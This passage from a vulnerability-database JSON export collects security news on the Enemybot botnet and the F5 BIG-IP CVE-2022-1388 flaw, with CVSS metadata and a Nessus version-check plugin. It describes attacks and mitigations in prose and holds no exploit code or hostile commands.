Linux-based botnet named **Enemybot** has expanded its capabilities to include recently disclosed security vulnerabilities in its arsenal to target web servers, Android devices, and content management systems (CMS).\n\n\"The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities,\" AT&amp;T Alien Labs [said](<https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers>) in a technical write-up published last week. \"Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices.\"\n\nFirst disclosed by [Securonix](<https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/>) in March and later by [Fortinet](<https://thehackernews.com/2022/04/new-enemybot-ddos-botnet-borrows.html>), Enemybot has been linked to a threat actor tracked as Keksec (aka Kek Security, Necro, and FreakOut), with early attacks targeting routers from Seowon Intech, D-Link, and iRZ.\n\nEnemybot, which is capable of carrying out [DDoS attacks](<https://en.wikipedia.org/wiki/Denial-of-service_attack>), draws its origins from several other botnets like Mirai, Qbot, Zbot, Gafgyt, and LolFMe. An analysis of the latest variant reveals that it's made up of four different components -\n\n * A Python module to download dependencies and compile the malware for different OS architectures\n * The core botnet section\n * An obfuscation segment designed to encode and decode the malware's strings, and\n * A command-and-control functionality to receive attack commands and fetch additional payloads\n\n\"In case an Android device is connected through USB, or Android emulator running on the machine, EnemyBot will try to infect it by executing [a] shell command,\" the researchers said, pointing to a new \"adb_infect\" function. ADB refers to [Android Debug Bridge](<https://developer.android.com/studio/command-line/adb>), a command-line utility used to communicate with an Android device.\n\nAlso incorporated is a new scanner function that's engineered to search random IP addresses associated with public-facing assets for potential vulnerabilities, while also taking into account new bugs within days of them being publicly disclosed.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgpc96pQMDAAqWfH85fEsGBf1xrj8m3a3gH9va1i7k-HmTzikPIzZGImKevqb3wxvW1wxFjhDs9J_Ii1xzSUdJpYaornlzqm5NOU8GCTzKMJoo7Tqy4kafPPjw7fLOUT5fXucBVfCUjMjn5-J2dr2U9992Sbsa-mLLWhevc7-l6Uqf_7AeQGz1sDvTF/s728-e100/goip.jpg>)\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjoCVQLY8Ozew4EQYe8whasxaFqzk8QnTX4P9wTrhC5kmGUuAW_20VD-gaPJ2Y9A-2hcLTSgVGc9UP7K9407c24ypTfJHRJvPoem7rVVTe50pMIY4MB-3dCwJ3rqYVc6BjGkU7_AGfuC5xLyp9rDp0g1R06cvFDa-Mxzow3EU9txlmSQAXEwuoIZQKn/s728-e100/log4j.jpg>)\n\nBesides the [Log4Shell vulnerabilities](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>) that came to light in December 2021, this includes recently patched flaws in Razer Sila routers (no CVE), VMware Workspace ONE Access ([CVE-2022-22954](<https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html>)), and F5 BIG-IP ([CVE-2022-1388](<https://thehackernews.com/2022/05/cisa-urges-organizations-to-patch.html>)) as well as weaknesses in WordPress plugins like Video Synchro PDF.\n\nOther weaponized security shortcomings are below -\n\n * [**CVE-2022-22947**](<https://thehackernews.com/2022/05/new-sysrv-botnet-variant-hijacking.html>) (CVSS score: 10.0) - A code injection vulnerability in Spring Cloud Gateway\n * [**CVE-2021-4039**](<https://nvd.nist.gov/vuln/detail/CVE-2021-4039>) (CVSS score: 9.8) - A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware\n * [**CVE-2022-25075**](<https://nvd.nist.gov/vuln/detail/CVE-2022-25075>) (CVSS score: 9.8) - A command injection vulnerability in TOTOLink A3000RU wireless router\n * [**CVE-2021-36356**](<https://nvd.nist.gov/vuln/detail/CVE-2021-36356>) (CVSS score: 9.8) - A remote code execution vulnerability in KRAMER VIAware\n * [**CVE-2021-35064**](<https://nvd.nist.gov/vuln/detail/CVE-2021-35064>) (CVSS score: 9.8) - A privilege escalation and command execution vulnerability in Kramer VIAWare\n * [**CVE-2020-7961**](<https://thehackernews.com/2021/01/freakout-ongoing-botnet-attack.html>) (CVSS score: 9.8) - A remote code execution vulnerability in Liferay Portal\n\nWhat's more, the botnet's source code has been shared on GitHub, making it widely available to other threat actors. \"I assume no responsibility for any damages caused by this program,\" the project's README file [reads](<https://github.com/freakanonymous/enemy>). \"This is posted under Apache license and is also considered art.\"\n\n\"Keksec's Enemybot appears to be just starting to spread, however due to the authors' rapid updates, this botnet has the potential to become a major threat for IoT devices and web servers,'' the researchers said.\n\n\"This indicates that the Keksec group is well resourced and that the group has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-30T10:30:00", "type": "thn", "title": "EnemyBot Linux Botnet Now Exploits Web Server, Android and CMS Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7961", "CVE-2021-35064", "CVE-2021-36356", "CVE-2021-4039", "CVE-2022-1388", "CVE-2022-22947", "CVE-2022-22954", "CVE-2022-25075"], "modified": "2022-05-31T04:11:39", "id": "THN:A4284A3BA2971D8DA287C1A8393ECAC8", "href": "https://thehackernews.com/2022/05/enemybot-linux-botnet-now-exploits-web.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-05-09T17:29:08", "description": "The Australian Cyber Security Centre (ACSC) has announced it is aware of the existence of Proof of Concept (PoC) code exploiting a F5 Security Advisory Addressing Multiple Vulnerabilities in its BIG-IP Product Range.\n\nThe vulnerability listed as [CVE-2022-1388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388>) allows attackers to bypass authentication on internet-exposed iControl interfaces, potentially executing arbitrary commands, creating or deleting files, or disabling services.\n\n## F5 BIG-IP\n\nThe BIG-IP platform by F5 is a family of products covering software and hardware designed around application availability, access control, and security solutions. It is used for various applications like load balancing and application delivery.\n\nOn May 4, 2022 F5 [notified](<https://support.f5.com/csp/article/K23605346>) users of the existence of a vulnerability in BIG-IP iControl REST where undisclosed requests could bypass iControl REST authentication. F5 stated that the vulnerability could allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. The attacker, in other words, could gain complete control over the affected device.\n\n## The vulnerability\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This vulnerability is listed as CVE-2022-1388 and received a [CVSS score](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) of 9.8 out of 10.\n\nF5 added that there is no data plane exposure; this is a control plane issue only. So, not much of a problem if the management plane is not exposed to the public Internet, you would think. But since F5 BIG-IP devices are commonly used in enterprises, this vulnerability is a significant risk as it would allow threat actors to exploit the bug to gain initial access to networks and then spread laterally to other devices. And experts estimate based on [online searches](<https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=EXCLUDE&q=services.http.response.html_title%3A+%22BIG-IP%26reg%3B-+Redirect%22+>) there are some 2,500 devices exposed to the Internet.\n\n## Exploits\n\nSoon after the patch, two separate groups of researchers announced on Twitter that they had developed exploits and would publish them soon. Other researchers noticed online scanning was ongoing for BIG IP.\n\nExploits are often found by reverse engineering the changes made by the patch, which is one of the reasons why patches should be applied as soon as possible. Besides assumed reputation damage, this is a reason why vendors and open source maintainers are often hesitant to request a CVE.\n\nThe researchers that created the exploits warned that all admins should immediately update their devices as soon as possible due to the trivial nature of the exploit. Now the ACSC has warned about the existence of a proof of concept, and attempts by malicious actors to exploit this vulnerability on Australian networks. \n\n## Mitigation\n\nA list of vulnerable products and versions can be found in the [F5 KB article](<https://support.f5.com/csp/article/K23605346>). Experts [recommend](<https://isc.sans.edu/diary/28624>) to take Internet-facing devices offline and check if they are safe first, before applying the patches. If an attacker has already planted a backdoor, they can still control the product even after patching.\n\nUntil it is possible to install a fixed version, you can use the following sections as temporary mitigations. These mitigations restrict access to iControl REST to only trusted networks or devices, thereby limiting the attack surface.\n\n * [Block iControl REST access through the self IP address](<https://support.f5.com/csp/article/K23605346#proc1>)\n * [Block iControl REST access through the management interface](<https://support.f5.com/csp/article/K23605346#proc2>)\n * [Modify the BIG-IP httpd configuration](<https://support.f5.com/csp/article/K23605346#proc3>)\n\nFor future use, this [F5 BIG-IP Security Cheatsheet](<https://github.com/dnkolegov/bigipsecurity/blob/master/README.md>) is a great resource to make sure your product is configured securely, and that attackers will not have access to the management interface from the Internet.\n\nPlease note that BIG-IP 11 and 12 are vulnerable as well but these are too old to be patched.\n\nStay safe, everyone!\n\nThe post [Update now! F5 BIG-IP vulnerability being actively exploited](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T15:39:17", "type": "malwarebytes", "title": "Update now! F5 BIG-IP vulnerability being actively exploited", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-09T15:39:17", "id": "MALWAREBYTES:78681A8703445F3DF21BACB3C703E8D2", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T16:55:50", "description": "As we [reported](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability/>) a few days ago, a F5 BIG-IP vulnerability listed as [CVE-2022-1388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388>) is actively being exploited. But now researchers have noticed that attackers aren&#x27;t just taking control of the vulnerable servers but also making them unusable by destroying the device\u2019s file system.\n\n## F5 BIG-IP\n\nThe BIG-IP platform by F5 is a family of products covering software and hardware designed around application availability, access control, and security solutions. It is used for various applications like load balancing and application delivery.\n\nOn May 4, 2022 F5 [notified](<https://support.f5.com/csp/article/K23605346>) users of the existence of a vulnerability in BIG-IP iControl REST where undisclosed requests could bypass iControl REST authentication. F5 said the vulnerability could allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. The attacker, in other words, could gain complete control over the affected device.\n\nSoon after the patch, two separate groups of researchers announced on Twitter that they had developed exploits and would publish them soon. Other researchers noticed online scanning was ongoing for BIG-IP.\n\nDue to the critical nature of the bug, F5 urged admins to apply updates as soon as possible.\n\n## New type of attack\n\nWhile most of the attacks so far were aimed at creating a foothold or gathering information for further attacks, we are now seeing a very different and destructive type of attacks.\n\nAt least one group of attackers is sending commands to vulnerable devices that delete the whole F5 file system, which is breaking load balancing and websites.\n\n[](<https://twitter.com/sans_isc/status/1523741896707043328>)_Attackers are wiping vulnerable devices&#x27; file system_s\n\nWhile destroying the file system of the device may seem worse than data exfiltration or planting a backdoor at first glance, some researchers are saying it may be a blessing in disguise. The group is making the vulnerable devices unavailable for threat actors that are trying to utilize the more monetizable attack vectors. Most of the original attacks were dropping web shells, which are malicious scripts used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\nThe motives of this threat actor are hard to guess. Maybe it\u2019s simply a case of showing off, or an act out of sheer frustration.\n\nBut for those running a vulnerable device this makes the \u201ccan\u2019t patch now, for it will make the device unavailable\u201d argument moot. If this attackers gets to you the device will be unavailable for much longer than it takes to patch.\n\nStay safe, everyone!\n\nThe post [F5 BIG-IP vulnerability is now being used to disable servers](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/f5-big-ip-vulnerability-is-now-being-used-to-disable-servers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T12:51:25", "type": "malwarebytes", "title": "F5 BIG-IP vulnerability is now being used to disable servers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-12T12:51:25", "id": "MALWAREBYTES:8A7CCD02A4D2FFC47ACB35E63C12DA1D", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/f5-big-ip-vulnerability-is-now-being-used-to-disable-servers/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wallarmlab": [{"lastseen": "2022-05-13T12:01:19", "description": "On May 5, 2022, MITRE published [CVE-2022-1388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388>), an authentication bypass vulnerability in the BIG-IP modules affecting the iControl REST component. The vulnerability was assigned a CVSSv3 score of 9.8\n\nThe vulnerability was discovered internally by the F5 security team and there is no evidence of whether it\u2019s exploited publicly. There is no publicly available proof of concept at the time of writing this blog post. Newly discovered BIG-IP vulnerability affects the following product and versions:\n\nBIG-IP (all modules):\n\n * 16.1.0 - 16.1.2\n * 15.1.0 - 15.1.5\n * 14.1.0 - 14.1.4\n * 13.1.0 - 13.1.4\n * 12.1.0 - 12.1.6 (Won\u2019t fix)\n * 11.6.1 - 11.6.5 (Won\u2019t fix)\n\n \n\n## F5 Big-IP Remote Code Execution Detection\n\nDo you want to find out if you are vulnerable to CVE-2022-1388? You might want to take a look at some of the tools we will mention below:\n\nBash script that checks for the existence of CVE-2022-1388 ([https://github.com/jheeree/CVE-2022-1388-checker](<https://github.com/jheeree/CVE-2022-1388-checker>)):\n\n\n\nNuclei template to detect CVE-2022-1388 ([https://github.com/MrCl0wnLab/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed](<https://github.com/MrCl0wnLab/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed>))\n\n\n\nPatches for the CVE-2022-1388 have been published on F5\u2019s [website](<https://support.f5.com/csp/article/K23605346>). You can fix the vulnerability by installing a version listed on the [website](<https://support.f5.com/csp/article/K23605346>).\n\nIf it\u2019s not possible for you to install a fix, for now, you can instructions listed on the F5\u2019s [website](<https://support.f5.com/csp/article/K23605346>) in the Mitigation part.\n\nWallarm was able to detect the CVE-2022-1388 exploit as 0day automatically with no additional configuration or updates required. The first attack was detected on May 9th, 1:45 am PT.\n\nWallarm Dashboard\n\nWhen using Wallarm in blocking mode, these attacks will be automatically blocked. No actions are required.\n\nWhen using a monitoring mode, we suggest creating a virtual patch. Feel free to reach out to [support@wallarm.com](<mailto:support@wallarm.com>) if you need assistance.\n\nThe post [CVE-2022-1388: Critical security vulnerabilities in F5 Big-IP allows attackers to execute arbitrary code](<https://lab.wallarm.com/cve-2022-1388-f5-big-ip-rce/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-06T17:06:26", "type": "wallarmlab", "title": "CVE-2022-1388: Critical security vulnerabilities in F5 Big-IP allows attackers to execute arbitrary code", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-06T17:06:26", "id": "WALLARMLAB:BED32468D036C4C2D5DC502940814368", "href": "https://lab.wallarm.com/cve-2022-1388-f5-big-ip-rce/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-06-15T22:30:10", "description": "The version of F5 Networks BIG-IP installed on the remote host is prior to 13.1.5 / 14.1.4.6 / 15.1.5.1 / 16.1.2.2 / 17.0.0. It is, therefore, affected by a vulnerability as referenced in the K23605346 advisory.\n\n - On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated (CVE-2022-1388)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-05-05T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : BIG-IP iControl REST vulnerability (K23605346)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-16T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL23605346.NASL", "href": "https://www.tenable.com/plugins/nessus/160537", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K23605346.\n#\n# @NOAGENT@\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160537);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/16\");\n\n script_cve_id(\"CVE-2022-1388\");\n script_xref(name:\"IAVA\", value:\"2022-A-0189\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/31\");\n\n script_name(english:\"F5 Networks BIG-IP : BIG-IP iControl REST vulnerability (K23605346)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of F5 Networks BIG-IP installed on the remote host is prior to 13.1.5 / 14.1.4.6 / 15.1.5.1 / 16.1.2.2 /\n17.0.0. It is, therefore, affected by a vulnerability as referenced in the K23605346 advisory.\n\n - On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior\n to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may\n bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support\n (EoTS) are not evaluated (CVE-2022-1388)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K23605346\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5 Solution K23605346.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1388\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'F5 BIG-IP iControl RCE via REST Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/05\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude('f5_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar version = get_kb_item('Host/BIG-IP/version');\nif ( ! version ) audit(AUDIT_OS_NOT, 'F5 Networks BIG-IP');\nif ( isnull(get_kb_item('Host/BIG-IP/hotfix')) ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/hotfix');\nif ( ! get_kb_item('Host/BIG-IP/modules') ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/modules');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar sol = 'K23605346';\nvar vmatrix = {\n 'AFM': {\n 'affected': [\n '16.1.0-16.1.2','15.1.0-15.1.5','14.1.0-14.1.4','13.1.0-13.1.4','12.1.0-12.1.6','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '17.0.0','16.1.2.2','15.1.5.1','14.1.4.6','13.1.5'\n ],\n },\n 'APM': {\n 'affected': [\n '16.1.0-16.1.2','15.1.0-15.1.5','14.1.0-14.1.4','13.1.0-13.1.4','12.1.0-12.1.6','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '17.0.0','16.1.2.2','15.1.5.1','14.1.4.6','13.1.5'\n ],\n },\n 'ASM': {\n 'affected': [\n '16.1.0-16.1.2','15.1.0-15.1.5','14.1.0-14.1.4','13.1.0-13.1.4','12.1.0-12.1.6','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '17.0.0','16.1.2.2','15.1.5.1','14.1.4.6','13.1.5'\n ],\n },\n 'GTM': {\n 'affected': [\n '16.1.0-16.1.2','15.1.0-15.1.5','14.1.0-14.1.4','13.1.0-13.1.4','12.1.0-12.1.6','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '17.0.0','16.1.2.2','15.1.5.1','14.1.4.6','13.1.5'\n ],\n },\n 'LTM': {\n 'affected': [\n '16.1.0-16.1.2','15.1.0-15.1.5','14.1.0-14.1.4','13.1.0-13.1.4','12.1.0-12.1.6','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '17.0.0','16.1.2.2','15.1.5.1','14.1.4.6','13.1.5'\n ],\n },\n 'PEM': {\n 'affected': [\n '16.1.0-16.1.2','15.1.0-15.1.5','14.1.0-14.1.4','13.1.0-13.1.4','12.1.0-12.1.6','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '17.0.0','16.1.2.2','15.1.5.1','14.1.4.6','13.1.5'\n ],\n },\n 'PSM': {\n 'affected': [\n '16.1.0-16.1.2','15.1.0-15.1.5','14.1.0-14.1.4','13.1.0-13.1.4','12.1.0-12.1.6','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '17.0.0','16.1.2.2','15.1.5.1','14.1.4.6','13.1.5'\n ],\n },\n 'WOM': {\n 'affected': [\n '16.1.0-16.1.2','15.1.0-15.1.5','14.1.0-14.1.4','13.1.0-13.1.4','12.1.0-12.1.6','11.6.1-11.6.5'\n ],\n 'unaffected': [\n '17.0.0','16.1.2.2','15.1.5.1','14.1.4.6','13.1.5'\n ],\n }\n};\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n var extra = NULL;\n if (report_verbosity > 0) extra = bigip_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n}\nelse\n{\n var tested = bigip_get_tested_modules();\n var audit_extra = 'For BIG-IP module(s) ' + tested + ',';\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, 'running any of the affected modules');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-15T16:59:46", "description": "A remote code execution vulnerability exists in the iControl REST API feature of F5's BIG-IP product. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-05-09T00:00:00", "type": "nessus", "title": "F5 BIG-IP RCE (CVE-2022-1388)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-12T00:00:00", "cpe": ["cpe:/h:f5:big-ip"], "id": "F5_CVE-2022-1388.NBIN", "href": "https://www.tenable.com/plugins/nessus/160726", "sourceData": "Binary data f5_cve-2022-1388.nbin", "cvss": {"score": 7.5, "vector": 